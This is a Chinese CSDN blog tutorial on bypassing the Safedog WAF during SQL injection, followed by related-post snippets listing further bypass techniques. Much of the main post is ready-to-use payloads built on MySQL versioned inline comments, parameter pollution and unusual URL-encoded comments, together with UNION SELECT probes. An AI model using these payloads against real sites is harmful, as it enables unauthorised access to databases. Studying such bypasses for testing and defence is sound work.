sql注入篇--绕过WAF

最新推荐文章于 2024-05-02 01:04:40 发布
最新推荐文章于 2024-05-02 01:04:40 发布
阅读量1.9k 收藏 19
点赞数 1
分类专栏: 注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51003021/article/details/126311283
版权

sql注入篇–绕过WAF

WAF就是网络安全防火墙。

一般我们有四种方式绕过WAF:

1.内联绕过安全狗
/*!44544 关键字 */
?id=1' /*!42444and*/ '1'='1
判断列数
?id=1' /*!42444order*/ /*!42444by*/ 3 --+
判断显示位
?id=-1' /*!42444union*/ /*!42444select*/ 1,2,3 --+
获取当前数据库
?id=-1' /*!42444union*/ /*!42444select*/ 1,/*!42444database*//*!42444()*/,3 --+

2.内联反向思维
/*!大于版本号*/注释内容
?id=1' /*!84544*/and '1'='1


3.get传参绕过(参数污染)
参数名=/*&正常参数&参数名=*/ ;
	例:a=/*&id=1&b=*/


?id=1' and '1'='1
?a=/*&id=1' and '1'='1&b=qr*/


4.奇怪的url编码绕过
/*%!字母*/

?id=1' /*%!s*/and '1'='1
?id=1' /*%!sw*/order/*%!sw*/by 4--+
?id=-1' /*%!sw*/union/*%!sw*/select 1,database/*%!sw*/(),3--+

下面的演示我是用的WAF都是安全狗

1)使用内联注释正常绕过

内联注释格式:/*!5位数字,但是不能大于版本号 关键字 */
在这里插入图片描述

然后我们使用如下:/!44544order//!23444by/ 3–+

在这里插入图片描述

成功绕过。接着我们获取信息:?id=-1’ /!44544union//!43344select/ 1,/!44544database//!33442()/,3 --+

在这里插入图片描述

2)内联反向思维绕过

内联注释格式:/*!5位数字,数字要大于版本号 注释内容 */

在这里插入图片描述

?id=-1’ /!84544sansan/union/!83444susncs/select 1,/!73542susncs/database/!85434susncs/(),3 --+

在这里插入图片描述

3)使用GET传参绕过

在原有的get参数基础上添加而外的参数,基本格式:

参数名=/&正常参数&参数名=/ ;

例:a=/&id=1&b=/

在这里插入图片描述

?a=/&id=-1’ union select 1,database(),3–+ &b=/

在这里插入图片描述

4)URL编码绕过

常见URL编码:

'=%27;"=%22;空格=%20;回车=%0d;换行=%0a;NULL=%00;水平制表=%09;垂直制表=%0b

更多编码查询:http://yige.org/tags/ref_urlencode.php

但是注意,以前可以利用常见的URL编码绕过,但是现在不行,需要使用一些奇怪的URL编码进行绕过;

例:%!字母 ,然后用**/*URL编码*/**做注释 如果一个URL编码不行,可以采用输入多个URL编码

在这里插入图片描述

?id=-1’ union/%!c/ select 1,/%!m/ database/%!w/ (),3 --+

在这里插入图片描述

YNB.小月半
关注
  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
WAF绕过SQL注入
向阳-Y.的博客
11-09 4298
WAF绕过SQL注入 对数据进行:大小写、加解密、编码解码等操作,使拦截失效 例如,以sqlilabs-less-2为例(假设安全狗已经设置了禁止查询数据库): 此时输入以下语句时,注入将会被拦截 id=-1 union select 1,database(),3# 首先我们大致分析一下为什么会被拦截? 安全狗拦截方式里采用了类似于正则表达式的编程,匹配到database()这个数据时,自动过滤。所以我们绕过只需要改变database()就行了: 下列语句中混插了“/**/”这样,安全狗就无法匹配到d
聊一聊SQL注入常用绕WAF小技巧
Javachichi的博客
02-08 1127
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
SQL注入WAF绕过
weixin_59872639的博客
02-19 1860
WAF绕过 WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依靠安全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“绕过WAF”就是指通过某种方式无视WAF的安全策略,达到攻击的目的。 方法1:变换大小写 比如WAF拦截了union,那就是用Union、UnIoN等方式绕过。 方法2:编码 WAF检测敏感字‘~’,则可以用编码0x7e代替 WAF检测敏感字select,则可以在URL中将select变成%73elEcT,编码接合
SQL注入9种绕过WAF方法
weixin_30437847的博客
03-22 1659
SQL注入9种绕过WAF方法 0x01前言 WAF区别于常规防火墙是因为WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止来自SQL注入、跨站点脚本(XSS)、文件包含和安全配置错误。 0x02 WAF工作原理 § 检测异常协议:拒绝不符合HTTP标准的请求 § 增强型的输入验证:代...
SQL注入如何绕过WAF
qq_55213436的博客
07-15 1339
不知道各位在平时的sql注入漏洞挖掘的过程中是否经常会遇到这样那样版本的安全狗,虽然说安全狗十分的可恶。今天就分享几种常见的安全狗绕过方法,亲测有效。特别是最后两种方法,100%绕过最新版本的安全狗。.........
SQL注入WAF小结
05-08
自己总结SQL注入WAF小结,有人能指点指点就更好啦。。
SQL注入WAF绕过
weixin_68999845的博客
07-31 664
对目标发送多个参数,如果目标没有多参数进行多次过滤,那么WAF对多个参数只会识别其中的一个。and=&& or=|| =(等于号)= 空格不能使用=%09,%0a,%0b,%0c,%0d,%20,%a0等 注:%0a是换行也可以替代空格。WAF绕过的思路就是让WAF的检测规则,识别不到你所输入的敏感字符,利用上述所介绍的知识点,灵活结合各种方法,从而可以增加绕过WAF的可能性。部分WAF只对字符串识别一次,删除敏感字段并拼接剩余语句,这时,我们可以通过双写来进行绕过
SQL注入WAF绕过注入
weixin_54105551的博客
07-03 2311
本文主要讲的是如何绕过WAF的基础知识,写的不好,请多多见谅。
SQL注入中的WAF绕过技术
weixin_33972649的博客
05-26 763
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mys...
SQL注入——WAf绕过
爱国小白帽
02-11 1636
WAF是什么? Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 Waf分类 代码WAF 软件WAF 硬件WAFWAF Sql注入waf常用方式 大小写混合 uNIoN sELecT 1,2,3,4 2...
深入了解SQL注入绕过waf和过滤机制
02-11
深入了解SQL注入绕过waf和过滤机制
分块传输绕过WAF进行SQL注入1
08-03
分块传输编码(Chunked transfer encoding)是超文本传输协议(HTTP)中的一种数据传输机制,允许HTTP由应用服务器发送给客户端应用
SQL Server的基本操作示例
weixin_58566539的博客
04-29 507
SQL Server的基本操作示例
常用SQL命令
最新发布
wenxiaoba的博客
05-02 928
常用SQL语句使用说明和示例
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
keyboard专栏
04-28 496
在 PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
SQL底层执行过程
qq_14886109的博客
04-28 908
SQL底层执行过程,INNODB,二阶段提交
优化SQL的方法
weixin_44139651的博客
04-26 1476
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
SQL注入绕过WAF
02-14
SQL注入绕过WAF的方法有很多种,其中一些常见的方法包括: 1. 使用URL编码来隐藏特殊字符,例如将“'”编码为“%27”。 2. 使用多语句查询来绕过WAF,例如将“;”替换为“%3b”。 3. 使用不常见的SQL关键字来绕过WAF,例如使用“version()”代替“@@version”。 4. 使用无用代码来混淆真正的SQL语句,例如在SQL语句中添加多余的空格和注释。 5. 使用已知的WAF绕过技巧来绕过WAF,例如使用“/*!union*/”代替“union”。 但是,这些方法并不能保证百分之百能绕过WAF,因为WAF的防御能力在不断提升,并且WAF厂商会不断更新WAF规则来防御这些攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值